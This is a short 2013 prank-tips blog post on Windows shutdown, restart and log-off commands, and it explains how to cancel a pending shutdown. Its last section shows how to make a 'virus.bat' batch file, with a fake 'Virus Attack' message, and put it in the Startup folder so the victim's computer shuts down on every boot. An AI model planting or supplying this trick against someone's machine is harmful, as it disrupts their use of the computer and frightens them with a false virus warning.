November 28, 2013
Shutdown and Restart Trick ! My Exclusive...Again a contribution to Computer Tricks! Play prankson your friends... **************************************************************************** Shutdown Trick Stimulate shutdownfrom command prompt ! # Start>> Run # Type shutdown -s -t 10 -c "Shutting Down..." # Hit Enterand enjoy ! **************************************************************************** Restart Trick Stimulate Restartfrom command prompt ! # Start>> Run # Type shutdown -r -t 10 -c "Restarting..." # Hit Enterand enjoy ! **************************************************************************** Log Off Trick Stimulate LogOfffrom command prompt ! # Start>> Run # Type shutdown -l # Hit Enterand enjoy ! **************************************************************************** Please Note -s:: This signifyShutdown Request. -r:: This signifyRestart Request. -l:: This signifyLogOff Request. -t:: This signify the timer before Restart.(Replace '10' with any number.) -c:: This signify comment. How To Stop It ? # When the timer is Running... # Start>> Run # Type shutdown -a # That's It. Prank !!! ------------------------------------------------------------- ۩We can make a batch filewhich will Shutdown the computer everytime on startup! Here is how ? ►Open Notepad ►Type : @ECHO OFF shutdown -s -t 10 -c "Virus Attack..." exit ►File>> Save As... ►Name it : virus.bat ►Start >> All Programs ►Right Clickon Startup>> Open ►This open the Startup folder ►Pastethe Virus.bat file here ! *** That's all , now the computer will automaticallyshutdownon every startup ! ----------------------------------
11/28/2013
COMPUTER TRICKS